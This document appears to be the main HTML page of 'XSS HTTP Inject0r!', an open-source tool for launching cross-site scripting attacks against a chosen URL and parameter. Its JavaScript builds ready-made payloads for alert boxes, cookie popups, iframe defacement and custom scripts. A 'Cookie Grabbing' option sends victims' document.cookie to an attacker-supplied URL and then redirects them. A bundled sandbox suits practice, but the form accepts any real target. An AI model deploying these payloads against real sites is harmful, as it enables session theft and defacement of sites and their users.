index.html 12 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275
  1. <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en">
  2. <head><title>XSS HTTP Inject0r!</title>
  3. <meta http-equiv="content-type" content="text/html;charset=utf-8">
  4. <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
  5. <style type="text/css">
  6. <!--
  7. body,td,th {
  8. color: #FFFFFF;
  9. }
  10. body {
  11. background-color: #000000;
  12. }
  13. a {
  14. color:lime;
  15. }
  16. -->
  17. </style>
  18. <script type="text/javascript">
  19. var alertbox = "<BODY ONLOAD=alert('1')>";
  20. var marquee = "<marquee>0wned!</marquee>";
  21. var cookie = "<ScRIPt>alert(document.cookie);<\/ScRiPt>";
  22. var iframe = "<iFrAmE src='../images/pwned.jpg' scrolling=no frameborder=0 width='812' height='576'><\/iFrAmE>";
  23. window.onload = function() {
  24. document.getElementById('use_custom').style.display = 'none';
  25. document.getElementById('cookie_grab_script_div').style.display = 'none';
  26. document.getElementById('get_poc').style.display = 'block';
  27. document.getElementById('post_poc').style.display = 'none';
  28. }
  29. function SetMethod(frm){
  30. if (document.getElementById('get').checked){
  31. document.getElementById('post_poc').style.display = 'none';
  32. document.getElementById('get_poc').style.display = 'block';
  33. document.poc.method="GET";
  34. }
  35. else{
  36. document.getElementById('post_poc').style.display = 'block';
  37. document.getElementById('get_poc').style.display = 'none';
  38. document.poc.method="POST";
  39. }
  40. }
  41. function SetScenario(frm){
  42. prefix = frm.prefix.value;
  43. custom_value = frm.custom_injection.value;
  44. cookie_grab_script=frm.cookie_grab_script.value;
  45. if (frm.target.value == ""){
  46. alert("Hey! Where is your target?")
  47. return false;
  48. }
  49. else if (frm.vulnerability.value == ""){
  50. alert("You should enter a vulnerable parameter")
  51. return false;
  52. }
  53. document.poc.action=frm.target.value;
  54. document.getElementById('lulz').name=frm.vulnerability.value;
  55. if(document.getElementById('alertbox').checked) {
  56. document.getElementById('lulz').value=prefix+alertbox;
  57. }
  58. if(document.getElementById('marquee').checked) {
  59. document.getElementById('lulz').value=prefix+marquee;
  60. }
  61. if(document.getElementById('cookie').checked) {
  62. document.getElementById('lulz').value=prefix+cookie;
  63. }
  64. if(document.getElementById('iframe').checked) {
  65. document.getElementById('lulz').value=prefix+iframe;
  66. }
  67. if(document.getElementById('custom').checked) {
  68. document.getElementById('lulz').value=prefix+custom_value;
  69. }
  70. if(document.getElementById('cookie_grab').checked){
  71. document.getElementById('lulz').value=prefix+unescape("%3CScRiPt%3Edocument.write%28%22%3Cimg%20src=%27")+cookie_grab_script+unescape("?%22%2bescape%28document.cookie%29%2b%22%27%3E%22%29")+";document.location='http://google.com';"+unescape("%3c%2FScRiPt%3E");
  72. }
  73. document.poc.submit();
  74. }
  75. function SetHook(frm){
  76. target = frm.target.value;
  77. vulnerability = frm.vulnerability.value;
  78. prefix = frm.prefix.value;
  79. custom_value = frm.custom_injection.value;
  80. custom_cookie_url = frm.cookie_grab_script.value;
  81. if (target == ""){
  82. alert("Hey! Where is your target?")
  83. return false;
  84. }
  85. else if (vulnerability == ""){
  86. alert("You should enter a vulnerable parameter")
  87. return false;
  88. }
  89. if(document.getElementById('alertbox').checked) {
  90. injection = prefix+alertbox;
  91. }
  92. if(document.getElementById('marquee').checked) {
  93. injection = prefix+marquee;
  94. }
  95. if(document.getElementById('cookie').checked) {
  96. injection = prefix+cookie;
  97. }
  98. if(document.getElementById('cookie_grab').checked) {
  99. injection = prefix+unescape("%3CScRiPt%3Edocument.write%28%22%3Cimg%20src=%27")+custom_cookie_url+unescape("?%22%2bescape%28document.cookie%29%2b%22%27%3E%22%29")+";document.location='http://google.com';"+unescape("%3C%2FScRiPt%3E");
  100. }
  101. if(document.getElementById('iframe').checked) {
  102. injection = prefix+iframe;
  103. }
  104. if(document.getElementById('custom').checked) {
  105. injection = prefix+custom_value;
  106. }
  107. document.getElementById('injection').value=injection;
  108. document.poc.action="hooker.php";
  109. document.poc.submit();
  110. }
  111. function SetScript(frm) {
  112. document.getElementById('use_custom').style.display = 'none';
  113. document.getElementById('cookie_grab_script_div').style.display = 'none';
  114. document.getElementById('line1').style.display = 'none';
  115. if (document.getElementById('custom').checked) {
  116. document.getElementById('use_custom').style.display = 'block';
  117. document.getElementById('line1').style.display = 'block';
  118. }else if (document.getElementById('cookie_grab').checked) {
  119. document.getElementById('cookie_grab_script_div').style.display = 'block';
  120. document.getElementById('line1').style.display = 'block';
  121. }
  122. }
  123. function LoadPoc(m,target,vuln,prefix,cook_grab_scr){
  124. if(m=="GET"){
  125. document.getElementById("get").checked=true;
  126. }else{
  127. document.getElementById("post").checked=true;
  128. }
  129. document.getElementById("target").value=target;
  130. document.getElementById("vulnerability").value=vuln;
  131. document.getElementById("prefix").value=unescape(prefix);
  132. document.getElementById("cookie_grab_script").value=cook_grab_scr;
  133. }
  134. var cans=Array();
  135. var frame=0;
  136. var vStickLength=0.6*(-5+18*Math.random());
  137. var vStickWidth=0.5+5*Math.random();
  138. var vIncX=Math.random()*80+20;
  139. var blocks=Array();
  140. function Egg(){
  141. window.scrollBy(0,100);
  142. var canvas = document.createElement('canvas');
  143. canvas.id = "CursorLayer";
  144. canvas.width = 250;
  145. canvas.height = 46;
  146. canvas.style.zIndex = -2;
  147. canvas.style.position = "relative";
  148. canvas.style.padding = 5;
  149. canvas.style.top = 0;
  150. canvas.style.border = "1px solid";
  151. var context = canvas.getContext('2d');
  152. if(frame<55){
  153. canvas.style.background = 'rgba('+parseInt(Math.random()*8+30)+','+parseInt(Math.random()*8+30)+','+parseInt(100+Math.random()*155)+',1)';
  154. context.font = 'italic 20pt Calibri';
  155. context.fillStyle='rgba('+parseInt(Math.random()*25)+','+parseInt(Math.random()*25)+','+parseInt(Math.random()*25)+',1)';
  156. context.fillText('BigBrother!!!', 20, 30);
  157. }else{
  158. canvas.style.background = 'lime';
  159. context.font = 'italic 20pt Courier';
  160. context.fillStyle='black';
  161. luck=Array("Remember","Use", "Squat", "Think", "Mayh3m!", "Hell!", "Destroy", "Fight", "Big Brother!", "Shit", "The", "Crypto", "Anarchy", "Truth", "Out", "Ilegal", "Hack", "CCTV", "XSS", "Satellite", "SlaveMaster", "Money", "Bitcoin", "Will be")
  162. context.fillText(luck[parseInt(luck.length*Math.random())], 20, 30);
  163. }
  164. if(frame<60) {
  165. b=document.body.appendChild(canvas);
  166. if(frame<60) blocks.push(b);
  167. }else{
  168. if(typeof blocks[frame-60]!="undefined") blocks[frame-60].style.display="none";
  169. }
  170. var canvas = document.createElement('canvas');
  171. canvas.style.zIndex = -666;
  172. canvas.width = 360;
  173. canvas.height = 598;
  174. canvas.style.position = "fixed";
  175. canvas.style.left=((frame*vIncX)%1024)+"px";
  176. canvas.style.top="10px";
  177. cans[frame]=canvas;
  178. document.body.appendChild(canvas);
  179. var ctx = canvas.getContext('2d');
  180. ctx.moveTo(-15+Math.random(50),20);
  181. for(i=0;i<5;i++){
  182. ctx.strokeStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
  183. ctx.lineWidth=3;
  184. ctx.strokeStyle='rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.4)';
  185. ctx.beginPath();
  186. cx=60+100*Math.random();
  187. cy=50+400*Math.random();
  188. ctx.arc(cx,cy, i*8.5, 0, 2 * Math.PI, false);
  189. ctx.fill();
  190. ctx.strokeStyle='rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
  191. ctx.fillStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
  192. ctx.arc(cx*vStickWidth,cy*vStickLength, i*2.5, 0, 2 * Math.PI, false);
  193. ctx.fill();
  194. ctx.lineWidth = i/6;
  195. ctx.strokeStyle = '#aa3300';
  196. if(!(frame%5)){
  197. for(j=0;j<=cans.length;j++){
  198. if(typeof cans[j] === 'undefined') continue;
  199. ctx=cans[j].getContext("2d");
  200. ctx.strokeStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',1)';
  201. }
  202. }
  203. }
  204. setTimeout('Egg()', 200);
  205. frame++;
  206. }
  207. </script>
  208. </head><body>
  209. <center>
  210. <table>
  211. <tr valign="middle">
  212. <td align="center">
  213. <br /><h2><a href="https://github.com/epsylon/xss-http-injector" target="_blank">XSS HTTP Inject0r!</a></h2> - 2014 - <a href="http://gplv3.fsf.org" target="_blank">GPLv3</a><br /><font size=-1><a style="text-decoration:none;" href=# onClick=javascript:Egg()>"little rabbit"</a> version</font>
  214. </td>
  215. <td>
  216. <img hspace="10" src="images/pwned.jpg" width="350" height="203" border="1"><br />
  217. </td>
  218. </tr>
  219. </table>
  220. <hr>
  221. <form name="poc">
  222. <table>
  223. <tr>
  224. <td><u>Method</u> (HTTP method):</td><td><table><tr><td><input type="radio" name="method" id="get" onclick="javascript:SetMethod();" checked value="GET">GET</td><td><input type="radio" name="method" id="post" onclick="javascript:SetMethod(this.form);" value="POST">POST</td></tr></table></td>
  225. </tr>
  226. <tr>
  227. <td colspan=2>
  228. <hr><script>var l=""+document.location;l=l.replace(/(.*)\/.*/,"$1/home.php")</script>
  229. <label id="get_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <i>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/get.html" target="_blank">SandBoX (HTTP-GET)</a> | <a onClick="javascript:LoadPoc('GET','sandbox/search.php','search_text','%22>',l)" href=#>Load PoC</a></label>
  230. <label id="post_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <i>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/post.html" target="_blank">SandBoX (HTTP-POST)</a> | <a onClick="javascript:LoadPoc('POST','sandbox/search.php','search_text','%22>',l)" href=#>Load PoC</a></label>
  231. <hr>
  232. </td>
  233. </tr>
  234. <tr>
  235. <td><u>Target</u> (Url to target's form):</td><td><input type="text" name="target" size="35" id="target"> (<i>ex: http://vulnsite.com/contact.php</i>)</td>
  236. </tr>
  237. <tr>
  238. <td><u>Vulnerability</u> (Vulnerable parameter):</td><td><input type="text" name="vulnerability" id="vulnerability"> (<i>ex: contact_email</i>)</td>
  239. </tr>
  240. <tr>
  241. <td><u>Vector</u> (Code prefix to inject):</td><td><input type="text" name="prefix" size="35" id="prefix"> (<i>ex: "></i>)</td>
  242. </tr>
  243. </table>
  244. <hr>
  245. <table border="1" cellpadding="6" cellspacing="6">
  246. <tr>
  247. <td>JS Alert</td><td> <input type="radio" name="exploit" id="alertbox" onclick="javascript:SetScript();" checked></td>
  248. <td>Cookie Popup</td><td> <input type="radio" name="exploit" id="cookie" onclick="javascript:SetScript();" /></td>
  249. <td>HTML Marquee</td><td> <input type="radio" name="exploit" id="marquee" onclick="javascript:SetScript();" /></td>
  250. <td>Cookie Grabbing</td><td> <input type="radio" name="exploit" id="cookie_grab" onclick="javascript:SetScript();" /></td>
  251. <td>Defacement</td><td> <input type="radio" name="exploit" id="iframe" onclick="javascript:SetScript();" /></td>
  252. <td>Custom Script</td><td> <input type="radio" name="exploit" id="custom" onclick="javascript:SetScript();" /></td>
  253. </tr>
  254. </table>
  255. <hr id="line1" style="display:none">
  256. <div id="use_custom" style="display:none">
  257. Custom injection: <input type="text" name="custom_injection" size="92">
  258. </div>
  259. <div id="cookie_grab_script_div" style="display:none">
  260. Grabbing URL: <input type="text" id="cookie_grab_script" name="cookie_grab_script" size="92">
  261. </div>
  262. <hr>
  263. <input type="hidden" id="lulz"></input>
  264. <input type="hidden" name="injection" id="injection"></input>
  265. <table cellpadding="6" cellspacing="6" border="0">
  266. <tr>
  267. <td><input type="submit" value="Inject!" onClick="return SetScenario(this.form)" style="padding: 10px; font-weight:bold;"></td>
  268. <td><input type="submit" value="Hooker" onClick="return SetHook(this.form)" style="padding: 10px; font-weight:bold;"></td>
  269. </tr>
  270. </table>
  271. </form>
  272. </body>
  273. </html>